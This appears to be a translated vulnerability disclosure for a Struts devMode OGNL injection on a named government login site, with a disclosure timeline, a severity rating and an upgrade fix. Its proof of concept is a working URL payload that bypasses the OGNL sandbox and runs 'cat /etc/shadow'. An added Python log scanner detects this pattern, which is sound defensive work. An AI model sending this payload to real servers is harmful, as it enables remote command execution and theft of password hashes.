2015-04-23: Details sent to the vendor, awaiting vendor response
2015-04-28: Vendor confirmed; details disclosed only to the vendor
2015-05-08: Details disclosed to core white hats and relevant domain experts
2015-05-18: Details disclosed to regular white hats
2015-05-28: Details disclosed to intern white hats
2015-06-12: Details disclosed to the public
Vulnerabilities are not dug up; they are discovered.
Site: http://pfxzsp.spb.gov.cn/generalservice/login/login_qy.jsp. Found a user guide download there and checked the source.
Tried /../../web.xml and found that the server-side Struts had debug mode enabled.
PoC
http://pfxzsp.spb.gov.cn/generalservice/loginlog/downLoadAction.do?debug=command&expression=%23f=%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29,%23f.setAccessible%28true%29,%23f.set%28%23_memberAccess,true%29,%[email protected]@getRequest%28%29,%[email protected]@getResponse%28%29.getWriter%28%29,%23a=%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cat%27,%27/etc/shadow%27}%29%29.start%28%29,%23b=%23a.getInputStream%28%29,%23c=new%20java.io.InputStreamReader%28%23b%29,%23d=new%20java.io.BufferedReader%28%23c%29,%23e=new%20char[4000],%23d.read%28%23e%29,%23resp.println%28%23e%29,%23resp.close%28%29
Downloaded file:
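As an added defender-side example (not part of the original report), the following Python scans web access logs for the devMode request pattern this report abuses: a `debug=command` parameter whose `expression` carries OGNL sandbox-bypass or process-execution markers, as well as other `debug=` values that reveal devMode is still on. The log lines are constructed samples; only the first mimics the report's request.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (not from the report). The first mimics the
# debug=command request pattern; the third shows devMode leaking via debug=xml.
SAMPLE_LOG = """\
10.0.0.5 - - [28/Apr/2015:11:19:02 +0800] "GET /generalservice/loginlog/downLoadAction.do?debug=command&expression=%23f%3D%23_memberAccess.getClass%28%29 HTTP/1.1" 200 512
10.0.0.7 - - [28/Apr/2015:11:19:05 +0800] "GET /generalservice/login/login_qy.jsp HTTP/1.1" 200 2048
10.0.0.9 - - [28/Apr/2015:11:20:10 +0800] "GET /generalservice/loginlog/downLoadAction.do?debug=xml HTTP/1.1" 200 300
"""

# Common Log Format: client, identity, user, [timestamp], "method target protocol", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# OGNL fragments that indicate a sandbox bypass or process execution inside the expression
OGNL_MARKERS = ("_memberAccess", "allowStaticMethodAccess", "ProcessBuilder", "Runtime")


def classify(target: str) -> Optional[str]:
    """Return a verdict for one request target, or None if it is not a devMode request."""
    qs = parse_qs(urlsplit(target).query, keep_blank_values=True)
    debug = qs.get("debug", [])
    if not debug:
        return None
    if "command" in debug:
        # parse_qs already decodes once; unquote again in case the value was double-encoded
        expr = unquote("".join(qs.get("expression", [])))
        if any(marker in expr for marker in OGNL_MARKERS):
            return "ognl-injection"
        return "devmode-command"
    return "devmode-debug"  # debug=xml / debug=console still shows devMode is enabled


def scan(log_text: str) -> List[Dict[str, str]]:
    """Parse each log line and collect the ones that carry a devMode debug request."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        verdict = classify(m["target"])
        if verdict:
            findings.append({"ip": m["ip"], "ts": m["ts"], "target": m["target"], "verdict": verdict})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} {f['verdict']} {f['target']}")
```

Any hit on `devmode-debug` or `devmode-command` already means `struts.devMode` is enabled in production, which is the misconfiguration the upgrade below should also remove.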
Upgrade
Severity: Medium
Vulnerability Rank: 10
Confirmed at: 2015-04-28 11:19
thanks
None yet